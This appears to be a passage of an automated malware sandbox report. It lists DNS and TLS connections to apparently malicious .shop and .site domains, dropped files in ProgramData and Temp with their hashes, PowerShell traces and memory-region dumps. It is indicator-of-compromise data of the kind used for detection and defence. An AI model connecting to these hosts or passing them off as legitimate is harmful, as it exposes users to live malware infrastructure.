| US | 8.8.8.8:53 | instantinfo.shop | udp |
| US | 172.67.170.122:443 | instantinfo.shop | tcp |
| US | 8.8.8.8:53 | timetablepdodwp.shop | udp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 8.8.8.8:53 | 125.66.21.104.in-addr.arpa | udp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 8.8.8.8:53 | webtime.site | udp |
| US | 172.67.222.142:443 | webtime.site | tcp |
| US | 8.8.8.8:53 | 142.222.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ieMODxkhNMrCbJWxGjU.ieMODxkhNMrCbJWxGjU | udp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 104.21.66.125:443 | timetablepdodwp.shop | tcp |
| US | 172.67.222.142:443 | webtime.site | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 06b496d28461d5c01fc81bc2be6a9978 |
| SHA1 | 36e7a9d9c7a924d5bb448d68038c7fe5e6cbf5aa |
| SHA256 | e4a2d1395627095b0fa55e977e527ccb5b71dff3cd2d138df498f50f9f5ab507 |
| SHA512 | 6488a807c978d38d65010583c1e5582548ab8102ebd68ee827e603c9bdfcdbb9f98a488d31414a829409f6edca8bd2eb4aadd4ff31b144de41249fa63a26bc91 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | de1d175f3af722d1feb1c205f4e92d1e |
| SHA1 | 019cf8527a9b94bd0b35418bf7be8348be5a1c39 |
| SHA256 | 1b99cae942ebf99c31795fa279d51b1a2379ca0af7b27bd3c58ea6c78a033924 |
| SHA512 | f0dcd08afd3c6a761cc1afa2846ec23fb5438d6127ebd535a754498debabd0b1ebd04858d1b98be92faf14b512f982b1f3dcbb702860e96877eb835f763f9734 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1487d5ab-d45d-4b96-af75-db60de9abe3e.tmp
| MD5 | 50adf9a9563af7fe2e36859c0d45579f |
| SHA1 | 105e198e1fbfa7616efe14705c743b5a7f9f6b7f |
| SHA256 | 0f65270cc437d3cf7aa30553c4420a4196e27e598459efc6a63731b2118fe8cd |
| SHA512 | dde3f0c7a6ace0a1c4992045265cb046292ea3dfa975e8c7e86ef9d5313c966b9894e447dcdc6cf7da7c2752934144681089bdc2d8933d8418f33d2afcdac715 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\CONT
| MD5 | 0b8726a3eebe541ee1ccae02a2cc8811 |
| SHA1 | 434810b4f6051eb8e0ef2ea034df63e8efa557cc |
| SHA256 | 3ac0ec1576eb739f7260eeb594d1a3301779291ab812379868d9acd696684d4d |
| SHA512 | 4a9c2dbeb92fab083e7f7ca2dacf55241166f5bfcfb8b84a852a9b2a268224a004aba08d8ecbcf9c77b0b60af2d2747084f3956a9807507076608ec6021bb1c7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b1943ab587f3de5e518eaea7a59be248 |
| SHA1 | 21d4fa394954a0aee8af676934bb8fd794a2babf |
| SHA256 | 1bad73c1f85d0de00da236c5ffcf03bbf121309704b4e5ecabd78d117127ab2d |
| SHA512 | fbba80d83a35ecd06076190c13cb20e4ef69b5c5fd6d9a77badfa2c9952d53f499d2e728258522f3e48e9a1bfa4f10726759e52bde239ed940a62da0be735735 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 54ed67d21d655a71358ebc9f94e720c2 |
| SHA1 | f942c88ce78341d04980b19e9a1cb1a53ac48400 |
| SHA256 | 0e62145c029619d04169642343b1cebb8e2a72d18de63928e8b37af1ff73f52e |
| SHA512 | 3eb4546e65fd0d63c2454ff61e0cd6348e6b5cec16a4f3698607ed10c510b1e415c062246c9bb7b5b41c3c3bbf559e07bc61ce0b25fde1416227347e08e09cd4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 1b1eefb7f57e4ae86c683e50d58808c1 |
| SHA1 | 9d143579d41c8ff60afb213a058a2ff0efa9ad78 |
| SHA256 | 01ffd30b72c8d6e7cefa5de7804a78b7bb3044cced989b5539a4e538a5a0f23c |
| SHA512 | 7debf206849035360f34041933b3ffebc750ede25b38e21db684334a7209a8766481b9ff0db264e6b2c3a495aa79558af72e22adef96991fc0260b99216d9b8a |
memory/3324-111-0x0000000005170000-0x00000000051A6000-memory.dmp
memory/3324-112-0x0000000005910000-0x0000000005F38000-memory.dmp
memory/3324-113-0x0000000005850000-0x0000000005872000-memory.dmp
memory/3324-114-0x0000000006030000-0x0000000006096000-memory.dmp
memory/3324-115-0x00000000060A0000-0x0000000006106000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y4yubce1.a5l.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3324-125-0x0000000006210000-0x0000000006564000-memory.dmp
memory/3324-126-0x00000000066F0000-0x000000000670E000-memory.dmp
memory/3324-127-0x0000000006740000-0x000000000678C000-memory.dmp
memory/3324-128-0x0000000008060000-0x00000000086DA000-memory.dmp
memory/3324-129-0x0000000006C20000-0x0000000006C3A000-memory.dmp
memory/3324-130-0x00000000079E0000-0x0000000007A76000-memory.dmp
memory/3324-131-0x00000000076F0000-0x0000000007712000-memory.dmp
memory/3324-132-0x00000000086E0000-0x0000000008C84000-memory.dmp
memory/3324-134-0x0000000007EF0000-0x0000000007F22000-memory.dmp
memory/3324-135-0x000000006D020000-0x000000006D06C000-memory.dmp
memory/3324-136-0x000000006D190000-0x000000006D4E4000-memory.dmp
memory/3324-146-0x0000000007ED0000-0x0000000007EEE000-memory.dmp
memory/3324-147-0x0000000007F30000-0x0000000007FD3000-memory.dmp
memory/3324-148-0x0000000008020000-0x000000000802A000-memory.dmp
memory/3324-149-0x0000000009C90000-0x0000000009CA1000-memory.dmp
memory/3324-150-0x0000000009CD0000-0x0000000009CE2000-memory.dmp
memory/3324-151-0x0000000009CC0000-0x0000000009CCA000-memory.dmp
C:\ProgramData\1ASPX.exe
| MD5 | 850a43e323656b86ae665d8b4fd71369 |
| SHA1 | 099d6e80c394ccc5233e1cbd6b29769da9e0e2aa |
| SHA256 | 539423d2e436e198df15b5577d816dc306ba4c03b1362f7731e675b51f4a5f42 |
| SHA512 | 1f2778040e906ea2939a8b0a682e267599aa8422f81ea83bb6c980a304b569ad750ef3e81e1490edd5b1d74e734a2cb82f428f47096c55436037e03e516d2378 |
C:\ProgramData\flutter_custom_cursor_plugin.dll
| MD5 | 09518cda3e0d986b81d434e04599bb45 |
| SHA1 | a434a37f575928b0f07c65588cafa28970d72234 |
| SHA256 | 3c0a26c3ca4b75fb1309a4461dd51e190ec6f325f689f5f881d90fa13dfb3d30 |
| SHA512 | dbebd11bbeb4f2b6fbfddc7c519805675b3babb6b5a7c1c65e6c5ddac4be18f1599359b712b706059c27e9144183fba0b2418ee672450a8ee5207b65b547369b |
C:\ProgramData\desktop_multi_window_plugin.dll
| MD5 | 42c063882fd7cedd3cc62356450d8987 |
| SHA1 | a09db77f70a6f7d7c59418fc08250a8e13e8a60d |
| SHA256 | 37d1ebfc8f423bf02dec598c6421e4124c8c5666c27782180d84003039e88dff |
| SHA512 | 77ac9c670f91059b2caa12da9b5417cd71d525f900b7dda51ffcf499aa2882734b342f6803814c6fde1b527c9742ed9cf67ab1ee8d141cb437b57c979d89b456 |
C:\ProgramData\flutter_windows.dll
| MD5 | e3e8d995e4a1d5e84ee11dbd58d21f3b |
| SHA1 | 52e7afb03dd3f45f7b8839879fec1acc7965a62e |
| SHA256 | 29782ac1f424865fa1007a5f818f35abb5307b01c099aaa38067513e516a0454 |
| SHA512 | f4fb26d4dc2d91d36fd8f26b9be6b74f50df94de530afdd8d2d5e9d6d6300b52fb9c6efbd94a95d630094ce59d5d1aa1b898f810be8806b7e9dfc5466d312659 |
C:\ProgramData\window_size_plugin.dll
| MD5 | 7024d49df9315b5718f40fcd29a8656f |
| SHA1 | ef243d1ec09f2fb714459d596f40a87b5b51c054 |
| SHA256 | 51877e41297ae94fe33d01d980717ae18938a3e81a32c57adc77d754ef7e66be |
| SHA512 | d9b7661b923b45020641f80a4695079a86f92848a022c8374c9339258a3f63d628000628cf75163b7c707a8506bb4d4928a1ea75e09fa6416eb9a2150eb5b705 |
C:\ProgramData\window_manager_plugin.dll
| MD5 | eab165f7a1856fc4fc191416a26f20f3 |
| SHA1 | 3e3baaa9a8ae20680d4b347a3a65e4a388dc0f4d |
| SHA256 | a2c87dfe4d43c7cc8ac44f2ac43bd45ec4f3f6ba87a2c73ae8b55f26286600e9 |
| SHA512 | 897e0f107beb1fcc6402183c535f2550e954b379451415e8b40403d0575efa6e1d1373f9f0b9a0649ab09515259490c7bfb9e9926f76735ee513f68460fb5143 |
C:\ProgramData\aeolotropy.yaml
| MD5 | 17c7c2c9b51a08322c5c94a50e92d81f |
| SHA1 | c6c94230ea0f3d2aa374491856c11d46e8bea555 |
| SHA256 | 597356a0d11076bb8560d5703e3bc47dcb490ee90b87573c04a3183e5f19f775 |
| SHA512 | 51e376a573826d35637e8f358beacd2ac28c9443ad586a4e139e172f84539bf26a10934669ba2b1da57793fe6cc70428da85044cfc465583deada2c059a44726 |
memory/1936-222-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp
C:\ProgramData\importunacy.tiff
| MD5 | ccd8a59b737b7968e8d4c1ecac083c42 |
| SHA1 | af4ca1a6d96bbc087a183898ba1db63bd14a1069 |
| SHA256 | 09697ae7191dd5d1f431cec653995242330da6655f96bab6e446ebfb8f3d6eb4 |
| SHA512 | 7aa7c585b9583c90a9518700cd7177fc6644a4f40c7ef360a3d828b0e936892b7fe54f5a4485017994fccb9ea6b869e4d77699df24955af433045fdccf5cfc1e |
C:\ProgramData\uni_links_desktop_plugin.dll
| MD5 | 94267176e212b8ebff06728cc6c3f432 |
| SHA1 | f65313083c2b3177f405b7ab884ba0a9be3251d9 |
| SHA256 | 08d08cbfa4d5531ceee16bfcb2255eda79c5b7f7c0894c4e6f49f673457ab362 |
| SHA512 | 014459c9d3dbe7c09e0d6db085ce9f715248ba6d784845339b2d6896a8ba7b680c93e707d4990350e30c8853a95fd0dc6f8e9244643787db65ab8a2f95c26967 |
C:\ProgramData\url_launcher_windows_plugin.dll
| MD5 | bfec2012b6589d4496ea0283e90a5269 |
| SHA1 | 813e3fad5cfe4a30e20f05080d106811c5544fa3 |
| SHA256 | f9406ecaa9c86f2946f8b9d997f0210f1f5ee974be6548d1db039014d1b45552 |
| SHA512 | 396f28eb15ed793db453cd3b3e9118f4386fe24a75e3f3914e881cca3ada8918b98751bdac51c4a5e897cca1e700b2a545686463a6b0dd6719ea172682cfb928 |
C:\ProgramData\texture_rgba_renderer_plugin.dll
| MD5 | 128d06b8c5739f35a7c76a76bf1e6149 |
| SHA1 | 901f9698bf4c4a10e8e902e6dbddf1782e1067d0 |
| SHA256 | bf585dbc4e4dce47f9efdeead15f67a69644ce6f1177ceec518882dc85ecc096 |
| SHA512 | ece9254486347751d6f68ae86afb36508fed81b00c4588f555db584a0e9de5f4710a24e6bb5b2b19a25bee20aa4bf90068f9eb2e37b48271614b6c97199e419c |
C:\ProgramData\screen_retriever_plugin.dll
| MD5 | 2d885495e81a8b8d1d5305fe20566484 |
| SHA1 | f1d2083d399dd48927cbd83e23f90ad3ce3e0632 |
| SHA256 | eb2e18881ddd80a3e54527264b3e7c5046f15854a196b76ccad28e8258f3f1b2 |
| SHA512 | e2bb9f8e377b381cc13538b39e8b3fb749341fcef84e7b26749bf35141c6c52a48636bb00c6fa7c585eec4c01b03cd0ec38c8f3e85e0ca2c2cda26d026def326 |
C:\ProgramData\flutter_gpu_texture_renderer_plugin.dll
| MD5 | e6c6c72226677bacf6ec83beda63f49d |
| SHA1 | c0e75c5a5b9d7c8cd07e80a2ba4d809801eff649 |
| SHA256 | 2018f17e324516fc891e5c868e2045970855a3a1521d73f0f6ae12ebf12cfbba |
| SHA512 | 3a52b60711efb4a34e5ff655e60d51a29c6d4b2cd4561a421a51647d5fcb2c75f1468a8f93c25206edebcf259112a4c7da41f90181ff7e53946e1fff5fb3f353 |
C:\ProgramData\file_selector_windows_plugin.dll
| MD5 | 9641732f1db2eab135130c9128c1427a |
| SHA1 | 88b0857cfe055a1d920e55b3094116162e4eaa00 |
| SHA256 | b47cd11e4089fe0ae8baf4e05b4ccf19b1dfe403fd392649e9253c05d58f3cbc |
| SHA512 | 5c87b26e51771b61fdf87d577781b1fb163527d0f03e74327bc11ea1a24b1b449d4ab23f7393466ed4baf3809a5151eb30928f462b5fcd55bb8de4bd733856a8 |
C:\ProgramData\desktop_drop_plugin.dll
| MD5 | f4df6a33f0e0633dc756f78f8838a067 |
| SHA1 | ce1c4544e1ea3db01ce2738b2575b0c33c25377d |
| SHA256 | c373994fbe373f500b129aff6700339c663ef14052eeaca53da8500877cbb937 |
| SHA512 | b3f7323e8eabea7ece7e52ba65bb6489029bcef6cb4935a01522fa973b3a0a108e1db2c8ea64abdd8a0529f5a9e15526b1677650c51757f775c38bfc1cd05e14 |
memory/1936-237-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\beedbd78
| MD5 | 174edf1933b82a399b614e092e04c3b2 |
| SHA1 | 8ad2eed94f563c40fb051d96fbdda12f7148ed2a |
| SHA256 | ceff3eb60d142bb1fdf699f62cb3d92af5cab0c4a7f90b74f9b711ecbe6bf698 |
| SHA512 | 1d6d0f1790a0f3ed6fe3a3e4d44961b9a1efc9e0f5663c4e31f1cc2994060ce06134ab5ffcfb0e6052ec740b7420debecc0eb5ebc3964b3266463e4baaf88d20 |
memory/3000-243-0x00007FFA51750000-0x00007FFA51945000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | f47baf517b53aff2b0edf7e7e9864e01 |
| SHA1 | 7f3c1fded0e9b328108b1568be8601bfa794b2df |
| SHA256 | c3a63cff50b2a98aa2533535d64de9e7d295e1eec808c70af38c3a393f9bc40b |
| SHA512 | 07cb18cc2532238364dc3987fabc97b520bb75cc0f7ede95f8836223f9f8a086d7e4b09d8a0a625c8e9828d183871322cc4afc16a98a8af2262c4234a5687a51 |
memory/4964-258-0x00000000063F0000-0x0000000006744000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ef3cd3ba0aafeb152d085021accc6d6f |
| SHA1 | 272a9e587a51b637d6a037fc0422b28ebaec3fc0 |
| SHA256 | 523e2fb13fbec89a96520226611473a75f6426464b0f75222426f67ef8fd9583 |
| SHA512 | c6d4de5906f777e63ebba097e750a9187560df1e98d9d8e7f5c05e0ba5aa2e3292bd952a6a2321b2718ba10e6164928f2590d83e45ca1248cd50dc26e8ac1055 |
memory/4964-260-0x000000006D020000-0x000000006D06C000-memory.dmp
memory/4964-270-0x0000000007CD0000-0x0000000007D73000-memory.dmp
memory/4964-271-0x0000000007F30000-0x0000000007F41000-memory.dmp
C:\ProgramData\ohok.zip
| MD5 | e02bfbbd372fdcb1983c1be661d68472 |
| SHA1 | 2fa2e2937a92a9f97060efadc28c2524db671d16 |
| SHA256 | 4566ae83ab0b869ba3d80e69966e7b296126ef28d9d5fe2e6c00b6a95ac3325d |
| SHA512 | 7e69a1c7fa2cb06adda7fb5d7a73cd589cdf94f465be7b1112571530e59b898646d48b9f6017b9d86dbd3e5a399a0eac021837147534fff249c0343831bc73cb |
memory/1908-287-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp
C:\Users\Admin\AppData\Roaming\LocalTls\desktop_drop_plugin.dll
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1908-305-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp
memory/3000-307-0x0000000075720000-0x0000000075B5C000-memory.dmp
memory/4880-308-0x00007FFA51750000-0x00007FFA51945000-memory.dmp
memory/2956-310-0x00007FFA51750000-0x00007FFA51945000-memory.dmp
memory/2956-311-0x0000000000F70000-0x0000000000FC0000-memory.dmp
memory/2956-323-0x0000000000F70000-0x0000000000FC0000-memory.dmp
memory/4864-324-0x00007FFA51750000-0x00007FFA51945000-memory.dmp
memory/2956-327-0x0000000000F70000-0x0000000000FC0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Pushing.cmd
| MD5 | f32d10ac89424e8d8658ff3b481c07c8 |
| SHA1 | e9718a08c8660e86bed522c616b0868cc4c1f61c |
| SHA256 | 6affa8644e677b6e7d9923cb78189be774ee32e7d12cde4b402344dea79fd2e7 |
| SHA512 | 01d281476c3ff1ddb3668c078f36e38b3dccdf4a1578fdc9678ca29a1970b4cba3dc74f061ea9605d393bf76a8af7b8bea16ca61b199eb72439d1196ee42dce2 |
memory/4864-778-0x0000000000EE0000-0x0000000000F30000-memory.dmp
memory/4728-784-0x00000000049D0000-0x0000000004A36000-memory.dmp
memory/4728-785-0x00000000049D0000-0x0000000004A36000-memory.dmp
memory/4728-786-0x00000000049D0000-0x0000000004A36000-memory.dmp
memory/4728-787-0x00000000049D0000-0x0000000004A36000-memory.dmp
memory/4728-788-0x00000000049D0000-0x0000000004A36000-memory.dmp
memory/4728-789-0x00000000049D0000-0x0000000004A36000-memory.dmp
memory/4728-790-0x00000000049D0000-0x0000000004A36000-memory.dmp
memory/4864-791-0x0000000000EE0000-0x0000000000F30000-memory.dmp
memory/4864-794-0x0000000000EE0000-0x0000000000F30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\64684\x
| MD5 | 1f9b5a942b513f1fbd30ceb1c706ad8b |
| SHA1 | b41e420c4202e90493d7900f8e62b92dfac3a3c3 |
| SHA256 | ac78619a32f1d561436ea5cbe000374255a263c2ea9131887670b539d154fb4f |
| SHA512 | 1ee595b4a1a7b083f84b514acc55e66928240d230d31e0415986ca9452e2647dfff81b6d910e4402350bb56fd54005f8474fc20badd5e8e2ac4945e179a20abb |